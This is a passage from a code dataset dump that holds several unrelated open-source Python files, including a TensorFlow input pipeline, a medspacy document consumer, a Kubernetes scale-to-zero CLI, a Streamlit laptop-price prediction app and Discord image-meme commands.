is_training: (bool) whether to use the train or test pipeline.\n At training, we shuffle the data and have multiple epochs\n filenames: (list) filenames of the images, as [\"data_dir/{label}_IMG_{id}.jpg\"...]\n labels: (list) corresponding list of labels\n params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)\n \"\"\"\n num_samples = len(filenames)\n assert len(filenames) == len(labels), \"Filenames and labels should have same length\"\n\n # Create a Dataset serving batches of images and labels\n # We don't repeat for multiple epochs because we always train and evaluate for one epoch\n parse_fn = lambda f, l: _parse_function(f, l, params.image_size)\n train_fn = lambda f, l: train_preprocess(f, l, params.use_random_flip)\n gray_fn = lambda f, l: grayscale(f, l)\n\n if is_training:\n dataset = (tf.data.Dataset.from_tensor_slices((tf.constant(filenames), tf.constant(labels)))\n .shuffle(num_samples) # whole dataset into the buffer ensures good shuffling\n .map(parse_fn, num_parallel_calls=params.num_parallel_calls)\n .map(train_fn, num_parallel_calls=params.num_parallel_calls)\n .map(gray_fn, num_parallel_calls=params.num_parallel_calls)\n .repeat(params.num_epochs)\n .batch(params.batch_size)\n .prefetch(1) # make sure you always have one batch ready to serve\n )\n else:\n dataset = (tf.data.Dataset.from_tensor_slices((tf.constant(filenames), tf.constant(labels)))\n .map(parse_fn)\n .map(gray_fn, num_parallel_calls=params.num_parallel_calls)\n .batch(params.batch_size)\n .prefetch(1) # make sure you always have one batch ready to serve\n )\n\n # Create reinitializable iterator from dataset\n # iterator = dataset.make_initializable_iterator()\n # images, labels = iterator.get_next()\n # iterator_init_op = iterator.initializer\n\n # inputs = {'images': images, 'labels': labels, 'iterator_init_op': iterator_init_op}\n return dataset\n\ndef train_datas(data_dir):\n train_data_dir = os.path.join(data_dir, \"train_faces\")\n # Get the filenames from the train sets\n train_filenames = [os.path.join(train_data_dir, f) for f in os.listdir(train_data_dir)\n if f.endswith('.jpg')]\n # Labels\n train_labels = [int(f.split('/')[-1].split('_')[0]) for f in train_filenames]\n return train_filenames, train_labels\n\ndef train_input_fn(data_dir, params):\n train_filenames, train_labels = train_datas(data_dir)\n # Specify the sizes of the dataset we train on and evaluate on\n params.train_size = len(train_filenames)\n # Create the iterator\n return input_fn(True, train_filenames, train_labels, params)\n\ndef test_datas(data_dir):\n test_data_dir = os.path.join(data_dir, \"test_faces\")\n # Get the filenames from the test sets\n test_filenames = [os.path.join(test_data_dir, f) for f in os.listdir(test_data_dir)\n if f.endswith('.jpg')]\n # Labels\n test_labels = [int(f.split('/')[-1].split('_')[0]) for f in test_filenames]\n return test_filenames, test_labels\n\ndef test_input_fn(data_dir, params):\n test_filenames, test_labels = test_datas(data_dir)\n # Specify the sizes of the dataset we test on and evaluate on\n params.test_size = len(test_filenames)\n # Create the iterator\n return input_fn(False, test_filenames, test_labels, params)","repo_name":"Conglang/DeepOps","sub_path":"facenet_face_recognition/model/input_fn.py","file_name":"input_fn.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13001617538","text":"from collections import OrderedDict\nfrom spacy.language import Language\n\nALLOWED_DATA_TYPES = (\"ent\", \"section\", \"context\", \"doc\")\n\nDEFAULT_ENT_ATTRS = (\n \"text\",\n \"start_char\",\n \"end_char\",\n \"label_\",\n \"is_negated\",\n \"is_uncertain\",\n \"is_historical\",\n \"is_hypothetical\",\n \"is_family\",\n \"section_category\",\n \"section_parent\",\n)\n\nDEFAULT_DOC_ATTRS = (\"text\",)\n\nALLOWED_SECTION_ATTRS = (\n \"section_category\",\n \"section_title_text\",\n \"section_title_start_char\",\n \"section_title_end_char\",\n \"section_text\",\n \"section_text_start_char\",\n \"section_text_end_char\",\n \"section_parent\",\n)\n\nALLOWED_CONTEXT_ATTRS = (\n \"ent_text\",\n \"ent_label_\",\n \"ent_start_char\",\n \"ent_end_char\",\n \"modifier_text\",\n \"modifier_category\",\n \"modifier_direction\",\n \"modifier_start_char\",\n \"modifier_end_char\",\n \"modifier_scope_start_char\",\n \"modifier_scope_end_char\",\n)\n\nDEFAULT_ATTRS = {\n \"ent\": DEFAULT_ENT_ATTRS,\n \"section\": ALLOWED_SECTION_ATTRS,\n \"context\": ALLOWED_CONTEXT_ATTRS,\n \"doc\": DEFAULT_DOC_ATTRS,\n}\n\n\n@Language.factory(\"medspacy_doc_consumer\")\nclass DocConsumer:\n \"\"\"A DocConsumer object will consume a spacy doc and output rows based on a configuration provided by the user.\"\"\"\n\n def __init__(self, nlp, name=\"medspacy_doc_consumer\", dtypes=(\"ent\",), dtype_attrs=None):\n \"\"\"Create a new DocConsumer.\n\n This component extracts structured information from a Doc. Information is stored in\n doc._.data, which is a nested dictionary. The outer keys represent the data type of\n can be either:\n - \"ent\": data about the spans in doc.ents such as the text, label,\n context attributes, section information, or custom attributes\n - \"section\": data about the sections within the notes, such as the\n section text and category\n - \"context\": data about entity-modifier pairs extracted by ConText\n - \"doc\": a single doc-level representation. By default only doc.text is extracted,\n but other attributes may be specified\n\n Once processed, a doc's data can be accessed either by:\n - doc._.data\n - doc._.get_data(dtype=...)\n - doc._.ent_data\n - doc._.to_dataframe(dtype=...)\n\n Args:\n nlp: A spaCy model\n dtypes (tuple or str): Either a tuple of data types to collect or the string \"all\".\n Default (\"ent\",)\n Valid options are (\"ent\", \"section\", \"context\", \"doc\")\n\n dtype_attrs(dict or None): An optional dictionary mapping the data types in dtypes to a list\n of attributes. If None, will set defaults for each dtype. Attributes for \"ent\" and \"doc\"\n may be customized be adding either native or custom attributes (ie., ent._....)\n \"context\" and \"section\" may only include the attributes contained in the default.\n Default values for each dtype can be retrieved by the class method DocConsumer.get_default_attrs()\n \"\"\"\n self.nlp = nlp\n self.name = name\n if not isinstance(dtypes, tuple):\n if dtypes == \"all\":\n dtypes = tuple(ALLOWED_DATA_TYPES)\n else:\n raise ValueError(\"dtypes must be either 'all' or a tuple, not {0}\".format(dtypes))\n for dtype in dtypes:\n if dtype not in ALLOWED_DATA_TYPES:\n raise ValueError(\"Invalid dtypes. Supported dtypes are {0}, not {1}\".format(ALLOWED_DATA_TYPES, dtype))\n if dtype == \"section\":\n self.validate_section_attrs(dtype_attrs)\n self.dtypes = dtypes\n self.dtype_attrs = dtype_attrs\n\n if self.dtype_attrs is None:\n self.set_default_attrs()\n\n @classmethod\n def get_default_attrs(cls, dtypes=None):\n if dtypes is None:\n dtypes = ALLOWED_DATA_TYPES\n else:\n if isinstance(dtypes, str):\n dtypes = (dtypes,)\n for dtype in dtypes:\n if dtype not in ALLOWED_DATA_TYPES:\n raise ValueError(\"Invalid dtype,\", dtype)\n dtype_attrs = {dtype: list(attrs) for (dtype, attrs) in DEFAULT_ATTRS.items() if dtype in dtypes}\n return dtype_attrs\n\n def set_default_attrs(self):\n self.dtype_attrs = self.get_default_attrs(self.dtypes)\n\n def validate_section_attrs(self, attrs):\n \"\"\"Validate that section attributes are either not specified or are valid attribute names.\"\"\"\n if attrs is None:\n return True\n if \"section\" not in attrs:\n return True\n diff = set(attrs[\"section\"]).difference(ALLOWED_SECTION_ATTRS)\n if diff:\n raise ValueError(\"Invalid section dtype_attrs specified: {0}\".format(diff))\n return True\n\n def __call__(self, doc):\n data = dict()\n for dtype, attrs in self.dtype_attrs.items():\n data.setdefault(dtype, OrderedDict())\n for attr in attrs:\n data[dtype][attr] = list()\n if \"ent\" in self.dtypes:\n for ent in doc.ents:\n for attr in self.dtype_attrs[\"ent\"]:\n try:\n val = getattr(ent, attr)\n except AttributeError:\n val = getattr(ent._, attr)\n data[\"ent\"][attr].append(val)\n if \"context\" in self.dtypes:\n for (ent, modifier) in doc._.context_graph.edges:\n self.add_context_edge_attributes(ent, modifier, data[\"context\"])\n if \"section\" in self.dtypes:\n for section in doc._.sections:\n self.add_section_attributes(section, data[\"section\"])\n if \"doc\" in self.dtypes:\n for attr in self.dtype_attrs[\"doc\"]:\n try:\n val = getattr(doc, attr)\n except AttributeError:\n val = getattr(doc._, attr)\n data[\"doc\"][attr].append(val)\n\n doc._.data = data\n return doc\n\n def add_context_edge_attributes(self, ent, modifier, context_data):\n if \"ent_text\" in self.dtype_attrs[\"context\"]:\n context_data[\"ent_text\"].append(ent.text)\n if \"ent_label_\" in self.dtype_attrs[\"context\"]:\n context_data[\"ent_label_\"].append(ent.label_)\n if \"ent_start_char\" in self.dtype_attrs[\"context\"]:\n context_data[\"ent_start_char\"].append(ent.start_char)\n if \"ent_end_char\" in self.dtype_attrs[\"context\"]:\n context_data[\"ent_end_char\"].append(ent.end_char)\n if \"modifier_text\" in self.dtype_attrs[\"context\"]:\n context_data[\"modifier_text\"].append(modifier.span.text)\n if \"modifier_category\" in self.dtype_attrs[\"context\"]:\n context_data[\"modifier_category\"].append(modifier.category)\n if \"modifier_direction\" in self.dtype_attrs[\"context\"]:\n context_data[\"modifier_direction\"].append(modifier.direction)\n if \"modifier_start_char\" in self.dtype_attrs[\"context\"]:\n context_data[\"modifier_start_char\"].append(modifier.span.start_char)\n if \"modifier_end_char\" in self.dtype_attrs[\"context\"]:\n context_data[\"modifier_end_char\"].append(modifier.span.end_char)\n if \"modifier_scope_start_char\" in self.dtype_attrs[\"context\"]:\n context_data[\"modifier_scope_start_char\"].append(modifier.scope.start_char)\n if \"modifier_scope_end_char\" in self.dtype_attrs[\"context\"]:\n context_data[\"modifier_scope_end_char\"].append(modifier.span.end_char)\n\n def add_section_attributes(self, section, section_data):\n # Allow for null sections\n if \"section_category\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_category\"].append(section.category)\n if section.category is not None:\n if \"section_title_text\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_title_text\"].append(section.title_span.text)\n if \"section_title_start_char\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_title_start_char\"].append(section.title_span.start_char)\n if \"section_title_end_char\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_title_end_char\"].append(section.title_span.end_char)\n else:\n if \"section_title_text\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_title_text\"].append(None)\n if \"section_title_start_char\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_title_start_char\"].append(0)\n if \"section_title_end_char\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_title_end_char\"].append(0)\n if \"section_text\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_text\"].append(section.section_span.text)\n if \"section_text_start_char\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_text_start_char\"].append(section.section_span.start_char)\n if \"section_text_end_char\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_text_end_char\"].append(section.section_span.end_char)\n if \"section_parent\" in self.dtype_attrs[\"section\"]:\n section_data[\"section_parent\"].append(section.parent)\n","repo_name":"Tshimanga/medspacy","sub_path":"medspacy/io/doc_consumer.py","file_name":"doc_consumer.py","file_ext":"py","file_size_in_byte":9379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70129662730","text":"# 1. 근묵자흑\n\nn, k = map(int, input().split())\nnumbers = list(map(int, input().split()))\nmin_number = min(numbers)\nmin_index = numbers.index(min_number)\n\nstart = min_index - (k-1)\nif start < 0:\n start = 0\n\nmin_count = n\nwhile start <= min_index:\n end = start + (k-1)\n count = 1\n i, j = start, end\n while i > 0:\n count += 1\n i -= (k-1)\n while j < n-1:\n count += 1\n j += (k-1)\n min_count = min(min_count, count)\n start += 1\nprint(min_count)","repo_name":"kylekim2123/Algorithm-with-Python","sub_path":"EXAM/스코페2021모의문제/[1]근묵자흑.py","file_name":"[1]근묵자흑.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39209485737","text":"#!/usr/bin/env python3\n\nimport click\nimport click_log\nimport logging\nimport time\nfrom zero_scale.app import scale_to_zero as zero\n\nlogger = logging.getLogger(__name__)\nclick_log.basic_config(logger)\n\n\n@click.command()\n@click_log.simple_verbosity_option(logger)\n@click.option('-s', '--scale', 'scale',\n default=0,\n help='Sets the scale of a deployment')\n@click.option('-p', '--period', 'period',\n default=60,\n help='The time (seconds) between checks')\n@click.option('--success-threshold', 'success_threshold',\n default=5,\n help='Number of positive results before action is taken')\n@click.option('-n', '--namespace', 'namespace',\n default='default',\n help='The k8 namespace')\n@click.option('-h', '--hpa', 'hpa_name',\n default='default',\n help='The HPA name')\n@click.option('-m', '--metric-name', 'metric_name',\n default='default',\n help='The metric name')\n@click.option('-d', '--deployment', 'deployment_name',\n default='default',\n help='The deployment to modify')\ndef run(scale, period, success_threshold, namespace, hpa_name, metric_name, deployment_name):\n\n\n params = click.get_current_context().params\n scaler = zero.ScaleToZero(params)\n successes = 0\n\n while True:\n try:\n time.sleep(period)\n logger.debug(f'successes: %s', successes)\n\n # Only call these once per iteration, saves overloading the API\n current_metric_value = scaler.current_metric_value()\n current_scale = scaler.current_scale()\n\n # Skip current iteration if scale is already 0\n if (current_metric_value == 0 and current_scale == 0):\n logger.info(f'Scale already 0 - skipping')\n continue\n\n # Scale to 0 if number of positive results are hit\n if successes == success_threshold:\n logger.info(f'Metric is zero: Scaling %s to 0', deployment_name)\n scaler.scale_deployment(0)\n successes = 0\n continue\n\n # HPA is disabled when target deployment scale is zero.\n # Force scale to be 1 if metrics > 1\n if (current_metric_value > 1 and current_scale == 0):\n logger.info(f'Non zero metric detected: Scaling to 1')\n scaler.scale_deployment(1)\n continue\n\n # Keep track of positive results\n if current_metric_value == 0:\n successes += 1\n else:\n logger.info('Metric not zero: Letting the HPA do its thing')\n successes = 0\n\n\n except Exception as e:\n logger.info(e)\n pass\n\nif __name__ == '__main__':\n run()\n","repo_name":"livelink/K8-HPAScaleToZero","sub_path":"zero_scale/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"32263155315","text":"from flask import *\nfrom Capstone.models import db\nproj = Blueprint('proj',\n __name__,\n template_folder='templates',\n static_folder='static',\n url_prefix='/proj')\n\n# create project - Jamia\n# proj/new\n\n# edit/ delete project - Jessica\n# proj/edit\n# proj/del\n\n# Find and search projects - Jamia\n# proj/browse\n\n# project view based on role - luke\n# proj/view\n\n# appy/accept to project - Luke\n\n# invite to project - Lily\n\n# project calendar - luke","repo_name":"jmoreno0587/Capstone","sub_path":"Capstone/Capstone/featProjects/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43751596655","text":"from os import walk\nfrom exif import Image\nfrom matplotlib import pyplot as plt\n\nfilenames = next(walk(\"./pokemon\"), (None, None, []))[2]\nimg_coords= list()\n\nfor filename in filenames:\n img_path = \"./pokemon/\"+ filename\n with open(img_path, 'rb') as src:\n img = Image(src)\n \n lat = (float(img.gps_latitude[0]) + float(img.gps_latitude[1])/60 + float(img.gps_latitude[1])/(60*60)) \n long = (float(img.gps_longitude[0]) + float(img.gps_longitude[1])/60 + float(img.gps_longitude[1])/(60*60)) \n\n img_coords.append([lat, long])\n\n\nplt.scatter(*zip(*img_coords))\nplt.show()\n","repo_name":"MartinSkatvedt/AdventCalendars2022","sub_path":"Knowit/12/password.py","file_name":"password.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73157509128","text":"\r\n# cd \"/Users/HP/OneDrive/Documents/Python Anaconda/Streamlit_Laptop_App\"\r\n# streamlit run AppPredictionLaptop.py\r\n\r\n# API: https://docs.streamlit.io/library/api-reference\r\n# dashboard: https://www.youtube.com/watch?v=Sb0A9i6d320\r\n\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pickle\r\n\r\n# other libraries\r\nfrom PIL import Image\r\nimport requests\r\nfrom streamlit_lottie import st_lottie\r\nfrom plotly import graph_objs as go\r\n\r\nfile1 = open('pipe.pkl', 'rb')\r\nrf = pickle.load(file1)\r\nfile1.close()\r\n\r\ndata = pd.read_csv(\"traineddata.csv\")\r\n\r\ndef main():\r\n # emojis: https://www.webfx.com/tools/emoji-cheat-sheet/\r\n # animations: https://lottiefiles.com/search?q=pc&category=animations\r\n st.set_page_config(page_icon=\":computer:\", layout=\"wide\")\r\n\r\n st.sidebar.title(\"NAVIGATION\")\r\n\r\n menu = [\"Home\", \"Visualisation\", \"Model described\", \"About\"]\r\n \r\n choice = st.sidebar.radio(\"Please select a page:\", menu)\r\n \r\n st.sidebar.markdown(\"\"\"---\"\"\")\r\n\r\n st.sidebar.subheader(\"More info:\"); \r\n st.sidebar.write(\":computer: https://jaroslavkotrba.com\")\r\n \r\n st.sidebar.write(\"Copyright © 2022\")\r\n\r\n #st.sidebar.write(\":star:\"*5)\r\n\r\n if choice == \"Home\":\r\n # Title\r\n st.markdown(\"

    Laptop Price Predictor

    \", unsafe_allow_html=True)\r\n\r\n # Image\r\n from PIL import Image\r\n image = Image.open('./pc.png')\r\n st.image(image, caption='Laptop Price Prediction with AI', use_column_width=True)\r\n \r\n st.write(\"

    Predict the price of a laptop that would suit your needs the best.

    \", unsafe_allow_html=True)\r\n\r\n # Brand\r\n default_company = list(data['Company'].unique()).index('Apple')\r\n company = st.selectbox('Brand', data['Company'].unique(), index=default_company)\r\n\r\n # Type of laptop\r\n type = st.selectbox('Type', data['TypeName'].unique(), index=1)\r\n\r\n # Ram present in laptop\r\n ram = st.selectbox('Ram (in GB)', data['Ram'].unique(), index=1)\r\n\r\n # Os of laptop\r\n os = st.selectbox('OS', data['OpSys'].unique(), index=0)\r\n\r\n # Weight of laptop\r\n weight = st.number_input('Weight of the laptop', 1.25)\r\n\r\n # Touchscreen available in laptop or not\r\n touchscreen = st.selectbox('Touchscreen', ['No', 'Yes'], index=0)\r\n\r\n # IPS\r\n ips = st.selectbox('IPS', ['No', 'Yes'], index=0)\r\n\r\n # Screen size\r\n screen_size = st.number_input('Screen Size', 13)\r\n\r\n # Resolution of laptop\r\n resolution = st.selectbox('Screen Resolution', ['1920x1080', '1366x768', '1600x900', '3840x2160', '3200x1800', '2880x1800', '2560x1600', '2560x1440', '2304x1440'], index=6)\r\n\r\n # Cpu\r\n cpu = st.selectbox('CPU', data['CPU_name'].unique(), index=1)\r\n\r\n # Hdd\r\n hdd = st.selectbox('HDD (in GB)', [0, 128, 256, 512, 1024, 2048], index=0)\r\n\r\n # Ssd\r\n ssd = st.selectbox('SSD (in GB)', [0, 8, 128, 256, 512, 1024], index=4)\r\n\r\n gpu = st.selectbox('GPU brand', data['Gpu brand'].unique(), index=0)\r\n\r\n left_column, right_column = st.columns(2)\r\n with left_column:\r\n pretty_result = {\"company\": company, \"type\": type, \"ram\": ram, \"weight\": weight, \"touchs_creen\": touchscreen,\r\n \"ips\": ips, \"screen_size\": screen_size, \"screen_resolution\": resolution, \"cpu\": cpu, \"hdd\": hdd, \"ssd\": ssd, \"gpu\": gpu}\r\n st.json(pretty_result)\r\n \r\n with right_column:\r\n import requests\r\n from streamlit_lottie import st_lottie\r\n \r\n def load_lottieurl(url):\r\n r = requests.get(url)\r\n if r.status_code != 200:\r\n return None\r\n return r.json()\r\n \r\n lottie_coding = load_lottieurl(\"https://assets1.lottiefiles.com/private_files/lf30_zdeFcW.json\")\r\n\r\n st_lottie(lottie_coding, height=370, key=\"coding\")\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n if st.button('Predict'):\r\n \r\n ppi = None\r\n if touchscreen == 'Yes':\r\n touchscreen = 1\r\n else:\r\n touchscreen = 0\r\n \r\n if ips == 'Yes':\r\n ips = 1\r\n else:\r\n ips = 0\r\n\r\n X_resolution = int(resolution.split('x')[0])\r\n Y_resolution = int(resolution.split('x')[1])\r\n\r\n ppi = ((X_resolution**2)+(Y_resolution**2))**0.5/(screen_size)\r\n\r\n query = np.array([company, type, ram, weight, touchscreen, ips, ppi, cpu, hdd, ssd, gpu, os])\r\n\r\n query = query.reshape(1, 12)\r\n\r\n prediction = int(np.exp(rf.predict(query)[0]))\r\n\r\n st.title(\"Predicted price: \" + str(round(prediction*0.4))+\" CZK\")\r\n\r\n st.subheader(\"More info:\")\r\n st.write(\"To see other author’s projects: https://jaroslavkotrba.com\")\r\n # ---- HIDE STREAMLIT STYLE ----\r\n hide_st_style = \"\"\"\r\n \r\n \"\"\"\r\n st.markdown(hide_st_style, unsafe_allow_html=True)\r\n \r\n elif choice == \"Visualisation\":\r\n # Title\r\n st.markdown(\"

    Laptop Data Visualisation

    \", unsafe_allow_html=True)\r\n\r\n st.write(\"

    Predict the price of a laptop that would suit your needs the best.

    \", unsafe_allow_html=True)\r\n\r\n from plotly import graph_objs as go\r\n st.subheader(\"Laptop Brand Count:\")\r\n company = data.groupby([\"Company\"]).size().reset_index(name='Freq')\r\n def plotly_data():\r\n fig = go.Figure([go.Bar(x=company['Company'], y=company['Freq'])])\r\n fig.update_traces(marker_color='#DC143C', marker_line_color='white', marker_line_width=1.5, opacity=1)\r\n fig.update_layout(\r\n plot_bgcolor = \"rgba(0,0,0,0)\",\r\n autosize=True,\r\n yaxis=dict(showgrid=False),\r\n xaxis_title=\"Brand\",\r\n yaxis_title=\"Amount of models\",\r\n title={'text': \"\", 'y':0.9, 'x':0.5, 'xanchor': 'center', 'yanchor': 'top'})\r\n st.plotly_chart(fig)\r\n plotly_data()\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n st.subheader(\"Laptop Ram Count:\")\r\n ram = data.groupby([\"Ram\"]).size().reset_index(name='Freq')\r\n ram['Ram'] = ram['Ram'].astype(str)\r\n def plotly_data():\r\n fig = go.Figure([go.Bar(x=ram['Ram'], y=ram['Freq'])])\r\n fig.update_traces(marker_color='#DC143C', marker_line_color='white', marker_line_width=1.5, opacity=1)\r\n fig.update_layout(\r\n plot_bgcolor = \"rgba(0,0,0,0)\",\r\n autosize=True,\r\n yaxis=dict(showgrid=False),\r\n xaxis_title=\"Ram\",\r\n yaxis_title=\"Amount of models\",\r\n title={'text': \"\", 'y':0.9, 'x':0.5, 'xanchor': 'center', 'yanchor': 'top'})\r\n st.plotly_chart(fig)\r\n plotly_data()\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n st.subheader(\"Laptop Weight Mean:\")\r\n weight = data.groupby([\"Company\"]).agg({'Weight':'mean'}).reset_index().rename(columns={\"Weight\":\"Weight mean\"})\r\n weight['Weight mean'] = round(weight['Weight mean'], 2)\r\n def plotly_data():\r\n fig = go.Figure([go.Bar(x=weight['Company'], y=weight['Weight mean'])])\r\n fig.update_traces(marker_color='#DC143C', marker_line_color='white', marker_line_width=1.5, opacity=1)\r\n fig.update_layout(\r\n plot_bgcolor = \"rgba(0,0,0,0)\",\r\n autosize=True,\r\n yaxis=dict(showgrid=False),\r\n xaxis_title=\"Company\",\r\n yaxis_title=\"Weight average in (kg)\",\r\n title={'text': \"\", 'y':0.9, 'x':0.5, 'xanchor': 'center', 'yanchor': 'top'})\r\n st.plotly_chart(fig)\r\n plotly_data()\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n st.subheader(\"More info:\")\r\n st.write(\"To see other author’s projects: https://jaroslavkotrba.com\")\r\n # ---- HIDE STREAMLIT STYLE ----\r\n hide_st_style = \"\"\"\r\n \r\n \"\"\"\r\n st.markdown(hide_st_style, unsafe_allow_html=True)\r\n \r\n elif choice == \"Model described\":\r\n # Title\r\n st.markdown(\"

    Laptop Model Described

    \", unsafe_allow_html=True)\r\n\r\n st.write(\"

    Predict the price of a laptop that would suit your needs the best.

    \", unsafe_allow_html=True)\r\n\r\n st.write(\"A random forest is a machine learning technique that's used to solve regression and classification problems.\")\r\n st.write(\"Random Forest Regression is a supervised learning algorithm that uses ensemble learning method for regression. Ensemble learning method is a technique that combines predictions from multiple machine learning algorithms to make a more accurate prediction than a single model.\")\r\n st.write(\"Random Forest Regression model is powerful and accurate. It usually performs great on many problems, including features with non-linear relationships. Disadvantages, however, include the following: there is no interpretability, overfitting may easily occur, we must choose the number of trees to include in the model.\")\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n import requests\r\n from streamlit_lottie import st_lottie\r\n \r\n def load_lottieurl(url):\r\n r = requests.get(url)\r\n if r.status_code != 200:\r\n return None\r\n return r.json()\r\n \r\n lottie_coding = load_lottieurl(\"https://assets7.lottiefiles.com/packages/lf20_ba013t74.json\")\r\n\r\n st_lottie(lottie_coding, height=200, key=\"coding\")\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n st.subheader(\"More info:\")\r\n st.write(\"To see other author’s projects: https://jaroslavkotrba.com\")\r\n # ---- HIDE STREAMLIT STYLE ----\r\n hide_st_style = \"\"\"\r\n \r\n \"\"\"\r\n st.markdown(hide_st_style, unsafe_allow_html=True)\r\n\r\n elif choice == \"About\":\r\n # Title\r\n st.markdown(\"

    Laptop Price About

    \", unsafe_allow_html=True)\r\n st.write(\"

    Predict the price of a laptop that would suit your needs the best.

    \", unsafe_allow_html=True)\r\n\r\n st.write(\"I created this app to be able to predict price of a laptop that I can configure on my own. To know a new laptop price according all models on the market is essential, just wanted to make sure that the price I am going to pay will be correct :)\")\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n # CONTACT\r\n # Use local CSS\r\n def local_css(file_name):\r\n with open(file_name) as f:\r\n st.markdown(f\"\", unsafe_allow_html=True)\r\n\r\n local_css(\"style.css\")\r\n\r\n left_column, right_column = st.columns(2)\r\n with left_column:\r\n st.write(\"##\")\r\n import requests\r\n from streamlit_lottie import st_lottie\r\n\r\n def load_lottieurl(url):\r\n r = requests.get(url)\r\n if r.status_code != 200:\r\n return None\r\n return r.json()\r\n \r\n lottie_coding = load_lottieurl(\"https://assets7.lottiefiles.com/packages/lf20_naj9ijgt.json\")\r\n\r\n st_lottie(lottie_coding, height=300, key=\"coding\")\r\n \r\n with right_column:\r\n with st.container():\r\n st.header(\"Contact me: \")\r\n st.write(\"##\")\r\n # Documention: https://formsubmit.co/\r\n contact_form = \"\"\"\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \"\"\"\r\n st.markdown(contact_form, unsafe_allow_html=True)\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n st.subheader(\"More info:\")\r\n st.write(\"To see other author’s projects: https://jaroslavkotrba.com\")\r\n # ---- HIDE STREAMLIT STYLE ----\r\n hide_st_style = \"\"\"\r\n \r\n \"\"\"\r\n st.markdown(hide_st_style, unsafe_allow_html=True)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"JaroslavKotrba/AppPredictionLaptopPrice","sub_path":"AppPredictionLaptop.py","file_name":"AppPredictionLaptop.py","file_ext":"py","file_size_in_byte":13585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41759132481","text":"from discord.ext import commands\nfrom PIL import Image\nimport functions,json\nimport discord \n\n\nclass hwn(commands.Cog):\n def __init__(self,bot):\n self.bot = bot\n @commands.command()\n async def hwn(self,ctx):\n text = ctx.message.content[len(\"$hwn\"):].strip()\n text = \"he will never \" + text\n image = None\n hwn = Image.open(\"images/hwn.png\").convert(\"RGBA\")\n if len(ctx.message.attachments)>0:\n img_name = ctx.message.attachments[0].filename\n await ctx.message.attachments[0].save(img_name)\n image = Image.open(img_name).convert('RGBA')\n elif ctx.message.reference is not None:#if message was referenced\n image_message = await ctx.fetch_message(ctx.message.reference.message_id)\n if len(image_message.attachments)>0:#if referenced message has image\n img_name = image_message.attachments[0].filename\n await image_message.attachments[0].save(img_name)\n image = Image.open(img_name).convert('RGBA')\n elif image_message.content.startswith('https://tenor.com'):\n img_name = await functions.get_gif(image_message.content)\n image = Image.open(img_name)\n elif image_message.content.startswith(\"https://media.discordapp.net\"):\n img_name = image_message.content[-5:]\n if image and text is not None:\n hwn = functions.place_image(0,0,252,196,hwn,image,img_name)\n hwn = functions.place_text(400,15,hwn,text)\n hwn.save(img_name)\n await ctx.message.channel.send(file=discord.File(img_name),reference=ctx.message)\n\n @commands.command()\n async def pfft(self,ctx):\n image1 = image2 = None\n pfft = Image.open(\"images/pfft.png\").convert(\"RGBA\")\n if len(ctx.message.attachments)>0:\n img_name1 = ctx.message.attachments[0].filename\n await ctx.message.attachments[0].save(img_name1)\n image1 = Image.open(img_name1).convert('RGBA')\n if ctx.message.reference is not None:#if message was referenced\n image_message = await ctx.fetch_message(ctx.message.reference.message_id)\n if len(image_message.attachments)>0:#if referenced message has image\n img_name2 = image_message.attachments[0].filename\n await image_message.attachments[0].save(img_name2)\n image2 = Image.open(img_name2).convert('RGBA')\n elif image_message.content.startswith('https://tenor.com'):\n img_name2 = await functions.get_gif(image_message.content)\n image2 = Image.open(img_name2)\n elif image_message.content.startswith(\"https://media.discordapp.net\"):\n img_name2 = image_message.content[-5:]\n if image1 and image2 is not None:\n image1 = functions.place_image(0,3,252,196,pfft,image1,img_name1)\n image1.save(img_name1)\n pfft = functions.stackImage(image2,image1,1,img_name1)\n await ctx.message.channel.send(file=discord.File(img_name1),reference=ctx.message)\n\ndef setup(bot):\n bot.add_cog(hwn(bot))","repo_name":"cheesegameslive/PeteBot-Python","sub_path":"commands/hwn.py","file_name":"hwn.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3689856860","text":"from linked_list import Node, LinkedList\n#from blossom_lib import flower_definitions\n\nclass HashMap:\n def __init__(self, size):\n self.array_size = size\n self.array = [LinkedList() for i in range(size)]\n def __repr__(self):\n return str(self.array)\n\n def hash(self, key):\n hash_code = sum(key.encode())\n return hash_code\n\n def compress(self, hash_code):\n 